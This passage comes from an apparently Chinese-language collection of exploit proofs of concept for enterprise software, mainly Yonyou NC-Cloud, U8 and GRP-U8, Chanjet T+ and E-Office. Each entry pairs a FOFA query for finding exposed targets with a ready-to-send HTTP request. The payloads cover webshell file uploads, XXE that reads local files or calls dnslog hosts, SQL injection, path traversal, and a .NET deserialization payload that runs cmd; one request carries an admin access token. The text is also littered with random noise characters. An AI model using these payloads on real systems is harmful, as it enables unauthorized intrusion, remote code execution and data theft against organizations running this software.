POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1. {: p- `: U4 d7 I1 q8 D3 @. w- N
Host: 203.25.218.166:88886 s0 z- p: p& p
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! z) {& I- M! k5 d5 N, i
Accept-Encoding: gzip, deflate- p% l `6 i, d( c
Accept: */*+ Z$ ~( d# |- @0 w8 j
Connection: close
' T t8 _. n" g5 Z8 h) haccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA ?$ V8 G8 @7 G; z. K @2 X9 y, P
Content-Length: 190; s% s2 N6 c& J1 N# G! ~& n; `
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
4 i7 ~3 R4 T! Y7 ` ]1 V4 V1 z; Y8 Z1 U! a+ ]6 q) G! `
--fd28cb44e829ed1c197ec3bc71748df0
. m- w8 N/ C4 k2 `0 cContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
9 i) ^! B4 V t2 f( Q7 x3 m
$ E7 g' x% s! c( ]& r* k( N<%out.println(1111*1111);%>$ J1 k8 ~' ^( b) [* O8 o
--fd28cb44e829ed1c197ec3bc71748df0--
# z8 f6 Z6 w1 B: o1 K( G1 j& W9 p; O9 P' ~6 L- y2 F7 ^
0 }5 n) }- u+ T/ S* i
36. 用友NC-Cloud soapFormat XXE- R, }! r. n; G, l' Z- d7 n
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"; P& ], X" D2 Y, }6 K" N
POST /uapws/soapFormat.ajax HTTP/1.1
. N# x* f0 R( a5 V$ iHost: 192.168.40.130:8989; e# G7 |, l6 o" c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! v/ }* O5 W. Y+ [$ k
Content-Length: 263
: C/ h* h+ k2 Z( g% i% {; eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" s! Q- q9 t2 c* mAccept-Encoding: gzip, deflate
* k. R, N3 K( V. }/ N! L$ cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) e7 G7 K" |7 }" ?7 SConnection: close
: S# t: U5 x( Z M5 b( F" SContent-Type: application/x-www-form-urlencoded( \% Q# d0 Q: J: A/ P9 r
Upgrade-Insecure-Requests: 1" j: N6 j5 B I$ w) ^# Y
0 D/ `9 e. n" N9 amsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
( Z* u( b, l0 A- `' w! f9 R, U1 X/ I) C& h" q0 R
[& \! M5 X9 W$ Q7 i
37. 用友NC-Cloud IUpdateService XXE
! L+ W3 k' x }FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"5 F5 s1 r* M; j
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
0 R( j/ |, r$ F4 SHost: 192.168.40.130:8989
$ S6 h, O( J3 w0 M. N( fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36# {" v% R- g4 B( u' P, R: f
Content-Length: 4218 i; u* w) }2 j) h; O/ p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 d8 a) U& ~/ e5 a4 WAccept-Encoding: gzip, deflate1 B6 K# D+ T4 T
Accept-Language: zh-CN,zh;q=0.9
/ P/ f! M0 F2 B$ v# \! `Connection: close
4 V- w# N9 ]. i0 q$ |" s! h* J+ |Content-Type: text/xml;charset=UTF-8& `1 ~0 ^5 q. K7 I0 O
SOAPAction: urn:getResult
; I3 l2 p5 w& p( HUpgrade-Insecure-Requests: 1
% u8 j; w" ?( k; C3 z, s& }" p
2 `% p3 B! z# y! {<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">0 U3 S- }% g2 ~3 w
<soapenv:Header/>
8 r' G( q' u6 p# r3 e5 ^ r<soapenv:Body>
5 ~5 b$ |/ K) V$ f<iup:getResult># x6 E8 Q; t i2 F9 T7 B+ d Y
<!--type: string-->
8 u3 t: P$ l. ]9 B<iup:string><![CDATA[
0 k, B, Z h. B+ i<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>, ?) w6 k, I Z" Y+ ^9 I. m3 P
<xxx/>]]></iup:string>
7 W8 Y" a! b1 C' v5 j" b4 E</iup:getResult>
: M$ C. V+ x, V1 W3 t* \; Y</soapenv:Body>" r, ~- Z4 b8 `9 C; C- Q
</soapenv:Envelope>, x7 X% {1 r+ t- P+ m
' N4 u* J7 W0 V1 \1 _
$ T) }" I o$ _& J/ X1 p3 g- j* r) e5 ?- ]
38. 用友U8 Cloud smartweb2.RPC.d XXE7 N" E9 U: w9 g6 N' _0 X& s6 E
FOFA:app="用友-U8-Cloud"2 g. _: v; q9 U* C) X0 K
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
2 @: B0 t! H6 e; UHost: 192.168.40.131:8088: m+ M% P; V" Y s# X7 `6 u7 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25; N* N' V1 v3 O
Content-Length: 260- b% ]9 |+ h( M' p0 w: S" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
- L) K; G8 f* d$ X/ W' |/ {Accept-Encoding: gzip, deflate
- ?" X: ?5 z# b' i& TAccept-Language: zh-CN,zh;q=0.9( u! c# E( O. L8 x; b. e. m
Connection: close
! n( Z' m9 Y! a* x5 AContent-Type: application/x-www-form-urlencoded! z6 h8 P$ K b8 r: f4 U
2 ]% a8 v P' n0 k__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>9 S8 z3 Q* ^) a+ u! I. m
# _2 E W" V. {/ E7 b I
2 }$ x6 p# ?7 _, `39. 用友U8 Cloud RegisterServlet SQL注入4 _: F% a* c4 d$ A4 N1 v+ u3 A
FOFA:title="u8c"
8 U( v' h* d U- x. M% s+ m; N9 M: bPOST /servlet/RegisterServlet HTTP/1.1
; d( @7 l( ^4 W) ]Host: 192.168.86.128:8089# L' w$ I8 G M) a, ]$ H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
& F/ O! E' x9 Z% c1 XConnection: close- [5 Z* a7 i: F4 f, X9 K
Content-Length: 852 L0 k$ W& o0 z6 f9 P
Accept: */*
9 A* U6 t9 d( d- ?Accept-Language: en3 c9 I, c/ s: c& F* [4 n2 W9 D
Content-Type: application/x-www-form-urlencoded% H1 ^# h( {1 Q: I
X-Forwarded-For: 127.0.0.1
6 d' x* k; V; qAccept-Encoding: gzip1 }7 m/ y3 C, O7 X- [ U
6 Q* c: h& m( L2 I! ^9 U. }) {: _
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" Y: B9 A9 b H; K" S& D2 h( ^* p0 q& Q4 R% r5 S. j* j
" [6 N# V- C) W/ Y) S1 m
40. 用友U8-Cloud XChangeServlet XXE
0 A% N' S) O2 M9 p8 CFOFA:app="用友-U8-Cloud"
* y3 [, Y, }2 {5 s- ~POST /service/XChangeServlet HTTP/1.1
) {- I* D3 w9 F. kHost: x.x.x.x
0 u j* p1 p0 b N$ l; o- tUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ {2 m }: K) b/ t) q1 f
Content-Type: text/xml( L1 |7 c. P! s: B9 J- N
Connection: close
$ i8 K m4 Y) @& X* `
. L9 @0 s: O! m# r6 h- `9 @<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>6 s6 D6 ]" I& k. [% t0 I
$ I& y; ^( l/ X% O6 p8 J5 Z/ o3 X& a* k- i' @" N$ i8 t( N) R
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入! x0 m+ T# j" o( n3 H! B# Y9 {
FOFA:app="用友-U8-Cloud"
|: A1 T2 d3 v0 K2 B8 s) ^GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1* }8 R' N" K3 `& |: h! v6 @
Host:
( C/ R, V- B |* Q9 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! S& R" ?% n) ^+ X+ [
Content-Type: application/json3 A. R1 }* E T0 T8 n( Q
Accept-Encoding: gzip
; k( X3 d% F; o& g; PConnection: close, a* G% v, F% ], v. d
. J4 {, H" z3 d- t+ i6 _2 _7 U/ b1 ?. Z' m
42. 用友GRP-U8 SmartUpload01 文件上传 b* u2 [) E; S) h6 _
FOFA:app="用友-GRP-U8"# I R N3 A' T1 ]
POST /u8qx/SmartUpload01.jsp HTTP/1.1
0 h/ X, q3 y7 b' F, IHost: x.x.x.x9 D2 F% X) Y" D# G7 Q& d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
0 r* ~% ?6 ?# U: x& }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
! i* |. {1 D O, d3 V) `9 H6 [' Z& x: M$ b: g9 [& |% H& C4 V
PAYLOAD! }! t& Z2 E8 Q
5 m+ T H* ~3 U3 k6 j* @" v0 N& [/ H0 r5 ~) F
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml; O! z' h# j; D w7 `" D$ E( K
" Q! ^# e4 e" A' q% p43. 用友GRP-U8 userInfoWeb SQL注入致RCE, u. U. {( V9 R; \
FOFA:app="用友-GRP-U8"# @4 t- g: T1 W% t4 ]4 Y
POST /services/userInfoWeb HTTP/1.14 f* \: y9 [" ^3 ?
Host: your-ip% I1 h; z( N' {' X( |: Z. ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ z! Q: H+ }* T2 |* z6 k- ~( Y: \( b$ ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) L1 N1 J2 i) @
Accept-Encoding: gzip, deflate: P# _) I7 b" \: ]
Accept-Language: zh-CN,zh;q=0.99 q& J' {0 l9 d T1 s5 e8 M8 ^( n
Connection: close+ j$ r$ c0 p& e3 B" d) O
SOAPAction:
, U5 ?+ ~) q: R' e- v# [Content-Type: text/xml;charset=UTF-80 H/ b( z. R3 F; L
: n& i, g* L/ X# N" \) T<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
! _; q0 G5 L/ l# @ <soapenv:Header/>
" N, a& ~7 N5 I1 d7 X+ l <soapenv:Body>8 \7 Q5 ]# Q+ D) D. @4 g7 h) I
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">( m2 y3 I2 Q8 Z
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>+ @ _. \( f G: e# T: l
</ser:getUserNameById>
# Q; J# `9 \2 p </soapenv:Body>
6 b* _8 P( U' l E) T+ v5 r4 i</soapenv:Envelope>
# Z$ z' r8 W( _5 p& {7 M7 q) i& [
: P4 G8 ~5 r: O: y& O6 d
, V2 ]7 L" _! }- k1 i7 B44. 用友GRP-U8 bx_dj_check.jsp SQL注入4 L4 n* _" g+ U% o
FOFA:app="用友-GRP-U8"
4 m) p1 Z+ `/ O& X8 \$ yGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( J, |! n9 K7 s% w
Host: your-ip
0 Y1 T: N3 e1 M1 v- gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.365 h7 P. B, ?+ T5 R" o7 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* O8 W' g5 W+ O4 F
Accept-Encoding: gzip, deflate# g8 F9 m* w7 k, O
Accept-Language: zh-CN,zh;q=0.9
9 \6 e( M. L* ^% m7 g( AConnection: close
0 t& h) U' u3 k8 i* y
8 x; |$ B! U6 O, `( a( S
3 l' t6 X% O$ Z$ D- ^3 G/ n r' l0 p45. 用友GRP-U8 ufgovbank XXE2 k3 Y+ G* ~! m% r6 U2 R+ m
FOFA:app="用友-GRP-U8"- ?% d2 n( Y7 R6 x* @$ Y% E( g# b
POST /ufgovbank HTTP/1.11 m- \& O; m, F s5 J2 D2 ?. V5 `
Host: 192.168.40.130:222
' ?* S, n4 z: a; g6 u/ |) ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" W! M$ T- l) _. G8 G
Connection: close$ F+ `1 R1 a+ E; l7 f
Content-Length: 161
- n8 G/ E% m) W2 ^, h1 M7 s: H+ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# R. W' u2 L% b, ^2 x N- TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; p1 \, t5 g4 Z3 \$ e- a% HContent-Type: application/x-www-form-urlencoded8 Z% t- V) A% a0 i) I8 ~
Accept-Encoding: gzip
$ j( y+ P8 g2 x; D) z) p8 p5 F: V3 s$ }
reqData=<?xml version="1.0"?>
/ R# O) \2 t- ?<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest+ Y' D- i/ W8 q
% A/ X7 I/ ^( Y1 e) v: u
% u' A {; x, A; }! {3 D+ w# c8 k46. 用友GRP-U8 sqcxIndex.jsp SQL注入4 }$ o+ b0 K, \: |& l
FOFA:app="用友-GRP-U8"
3 F) ]1 C) W8 C" @2 s$ ` UGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
, J/ L1 I$ e# c1 v1 o6 V5 M) QHost: your-ip+ N' q( O# W9 ]3 A% O' r; r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36( N3 l o8 l- C5 Y! e7 l( k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ {4 k( ~" U; ] @% RAccept-Encoding: gzip, deflate- j7 P/ A0 C$ t- T, B3 t& q
Accept-Language: zh-CN,zh;q=0.90 r2 }( t7 T5 u! {* ^) |
Connection: close2 H8 P7 Q! I( C+ E' I
# |# F2 b/ Z' T2 t
$ r p3 [% p- D0 u47. 用友GRP A++Cloud 政府财务云 任意文件读取
/ `! m1 ^4 ~9 H2 tFOFA:body="/pf/portal/login/css/fonts/style.css"
+ V4 A7 Y0 |4 j5 D6 l( tGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, L y; F. p& ]3 ?9 ?2 f6 Z. KHost: x.x.x.x
5 m5 I" M* t" S% kCache-Control: max-age=0
( C7 `7 z, |% ]8 aUpgrade-Insecure-Requests: 1; k% j# l: K! _$ t! t+ s3 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# a: K$ L1 ]8 v( z f$ s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. k# J- `/ I3 H8 }5 F6 x _% T# s( U
Accept-Encoding: gzip, deflate, br
1 a$ }5 t0 D' }2 O7 Y+ q: @Accept-Language: zh-CN,zh;q=0.9% g* v: o8 | v1 T
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT# I8 ^5 M: M: c, {
Connection: close& Z& z$ M! p# d) j
3 A y2 H& L' o! C3 v) \* l9 y
0 k3 ], R" O( ]6 _2 E2 c
. C; f6 Y& ]2 T2 V) V
48. 用友U8 CRM swfupload 任意文件上传. W7 a5 T/ W; _( u9 k* S- @
FOFA:title="用友U8CRM"' x+ ]0 G( M& h) m$ ^, D6 H3 `
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1" N) ]' P+ Y+ s z9 n. t8 n/ V
Host: your-ip
( I1 R3 E! k4 {* g8 u1 z; IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ o& C7 ?8 G; {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- h0 H6 u3 y* K0 f" E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! O1 x+ ?+ [+ L4 l2 YAccept-Encoding: gzip, deflate5 P! f; ?/ ?/ [
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
* T* D p; R, m. ~------269520967239406871642430066855
h/ {$ S3 i4 w% B$ [" cContent-Disposition: form-data; name="file"; filename="s.php"0 C8 c5 R; t" L8 W: L! S
1231( Y% U, e! }( P2 E! c
Content-Type: application/octet-stream
, l$ U3 b0 r2 l7 L6 X0 l6 Z! o------2695209672394068716424300668552 } B, k3 C+ a" `
Content-Disposition: form-data; name="upload"' Q: A- e" ?) z! m! V- ~5 k) O
upload: F$ G, {- d: d. ~" y6 s4 `( l
------269520967239406871642430066855-- z$ K1 v2 P9 N9 N( i7 p
, l9 Y p' N+ K4 O. l+ j
" ?3 b, N9 r [' U( v% J/ W
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
7 k- R' W- ^" i# B0 h/ IFOFA:body="用友U8CRM"
( ]( {1 ?! m& d: r& x
; @, s9 X* l( PPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
! Y" q/ s0 k; m5 ~Host: x.x.x.x
2 m T8 Q D& O8 m) ^# t6 V/ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 ^. y+ Z5 I# ]* j7 }- g) yContent-Length: 3293 n0 G2 A* G+ f" ~1 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ y$ p$ [, ^5 M' T+ oAccept-Encoding: gzip, deflate
0 N. [; S. `: W1 @+ [( jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: V- X1 O" A DConnection: close
& t( V8 w' D8 V0 D. w2 DContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w3 v" _0 e3 x2 j/ x* ]
$ [# L o4 C! p8 `/ l5 H- k$ H
-----------------------------vvv3wdayqv3yppdxvn3w
$ i* J2 y" ]3 ^7 ?: nContent-Disposition: form-data; name="file"; filename="%s.php "
- E( J( |7 h# | }' m' mContent-Type: application/octet-stream" i4 ?( _& v3 f' w
! m# S) r, n% }6 |
wersqqmlumloqa3 D& s8 y; @/ b: o; p) _) X" l
-----------------------------vvv3wdayqv3yppdxvn3w2 B/ u8 \) b$ m/ G
Content-Disposition: form-data; name="upload"
! O3 d6 U9 [# `& V" ]
0 z, L( t, p9 L [upload0 W1 D% B, l) \! J
-----------------------------vvv3wdayqv3yppdxvn3w--
+ o r3 h2 X. n' o
9 B% e8 S, X$ ~3 b H9 Y: n c, U$ e O. t3 q
http://x.x.x.x/tmpfile/updB3CB.tmp.php( g; h0 {5 r" D; D" I6 U* e! c" I
* [( ?0 M }, U( d: J3 h# _$ {! [50. QDocs Smart School 6.4.1 filterRecords SQL注入
% {+ z- t1 {& |/ I" w- mFOFA:body="close closebtnmodal" b8 D4 h+ x$ J- T+ `
POST /course/filterRecords/ HTTP/1.10 v! n6 W( c- }. y* I
Host: x.x.x.x& ?5 m0 p9 R" n5 M1 f" j8 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& [8 x S- z" G6 K; I3 d
Connection: close
; i& U8 v. O5 D1 M7 pContent-Length: 224/ H( }% `6 J% h" }
Accept: */*. _6 l: O+ Q& ~ g6 ^8 _
Accept-Language: en
5 s$ W& ]1 D% }$ _" xContent-Type: application/x-www-form-urlencoded
' |7 c- N4 v7 Y6 j( |Accept-Encoding: gzip
2 B6 @$ {, q& Q! X# G- C ?
: O4 s; a6 C$ x) _ lsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=15 Z6 I# K0 W7 N4 d/ t& j& ]
& h$ V" N1 G$ O t" ^- P
- X9 F8 C8 o9 l+ }51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入+ Z) M( c$ E9 h, F' Y" {: X
FOFA:app="云时空社会化商业ERP系统"
: D. `) [8 Z/ R' p7 T6 ?5 tGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.12 k" b2 \/ z- U: w
Host: your-ip: v3 Y$ _! o6 X- q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.362 P% {; @, I! R( _* z$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
2 _0 M, b |- [/ R; U6 KAccept-Encoding: gzip, deflate A: Y" J J6 H, d9 [* a
Accept-Language: zh-CN,zh;q=0.9) m0 E) N* m8 K' D9 l5 _
Connection: close
& g/ b2 L+ }4 m: y$ b
0 O$ |& d' O% X/ A$ b# C* j) W" B6 [, U4 s
52. 泛微E-Office json_common.php sql注入
4 Y9 K: Z1 t* j7 h O: bFOFA:app="泛微-EOffice"( m1 m8 P/ p/ E% H0 G4 n
POST /building/json_common.php HTTP/1.1
- u/ j# J1 G0 u8 \1 aHost: 192.168.86.128:8097& s8 T% w) `3 i8 f9 T
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* A' K3 D4 G+ _6 }! K& RConnection: close
P' w5 F Z t8 S" ^Content-Length: 87
d6 X9 r- y6 e, {# EAccept: */*: n! M+ W/ k$ I
Accept-Language: en" m: ^: j) _% z- r8 c4 H- U
Content-Type: application/x-www-form-urlencoded
4 T, X/ T3 S# {9 X2 G, p7 DAccept-Encoding: gzip
! h2 ^! X, e6 x5 B; q
2 C ~+ h6 E5 |0 Stfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
* c6 z, I5 K* n6 C+ M
. j, j7 ], l6 }' l* k. X% ?
+ r: P9 @. B/ h( u7 H8 N0 Z! E( y: a53. 迪普 DPTech VPN Service 任意文件上传
$ x: }( m; c! c# f/ V$ F5 r, ~FOFA:app="DPtech-SSLVPN"
( }- o0 X* k3 B4 h/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+ ]1 |7 Z% {* T6 D; t2 L* V- f7 {
* x/ `/ I2 ~+ t% Z7 d- i# \
; [5 ?" L) a) S5 n' A, Y: g0 t54. 畅捷通T+ getstorewarehousebystore 远程代码执行
4 A* i2 x- l* qFOFA:app="畅捷通-TPlus"8 @, y W8 p ?' u3 N4 D& z; y
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
' m. M& x# I* n T% k$ {+ z"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"2 d# ?! `# j: z; A6 r+ w' e
9 Z# D7 B+ l' h4 j% E. E1 n
' l& H9 \ w% H完整数据包9 t. W1 W0 f0 T. A% _
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
3 r% F4 V& D: ?3 H1 G" c) _Host: x.x.x.x B' B: A% L1 ~
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
. K0 e# b l, u O, x5 m$ VContent-Length: 593. y9 C: O4 v N- v+ H" U6 _) v
" D: o) e9 o1 [. }9 ?/ H
{5 X; x$ H1 l( V. o4 o
"storeID":{
! _$ z. w( l" N/ k" O$ N, ~( I "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 P8 H$ E4 I. H4 @0 Z
"MethodName":"Start",% v* U! ?" Z3 R2 y! Z, L
"ObjectInstance":{
3 N2 o( d4 e9 z; p4 ]8 T "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" h$ ~$ h: g# D "StartInfo":{
8 [# f, _2 N4 F2 I! ` "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 \5 f2 Z" O8 T8 x3 v: U6 n "FileName":"cmd",4 D; j8 `$ t% `+ s& _
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: `. d! A; x+ ?6 r" A! j }
+ `; i0 a6 ~1 M }0 i7 Z% O" V) }2 Q! O
}
+ G* j2 g8 V) W, i9 y% z}; N( o" D* C3 u- _0 ? F! T% z
% E. W8 I9 Z$ A2 N. {7 C- ?5 U+ O- _" F; Z/ A7 f S
第二步,访问如下url
2 a6 }$ }7 f' G" V* }/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt! k1 |3 J7 a# A0 i' b1 L; u
2 x" x; y8 G' }$ l
/ J1 ^- V! l t( M( D
55. 畅捷通T+ getdecallusers信息泄露- d e, J# S3 H" u
FOFA:app="畅捷通-TPlus"
/ q$ E4 m6 u4 p. I第一步,通过# p: b: u7 d4 z! T/ P4 G6 g5 e
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie5 H3 T! s+ s! D9 v- B0 h7 K2 k
第二步,利用获取到的Cookie请求5 K' C* l4 ?3 e: b! i
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers4 X1 I- {: o8 r
( t5 P/ r$ l3 _- \. O) Q
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
' }# R9 P7 R/ J: q; QFOFA: app="畅捷通-TPlus"- X5 _- z# Z: s5 M% ~# n
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
, B6 P. [6 M1 J: a* RHost: x.x.x.x1 [' \/ K" {1 x4 }) B) C) q5 J% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; q9 J3 `8 h% b
Content-Type: application/json9 l1 m; p! X) `
7 k0 P I5 M, K: h% b5 O
{
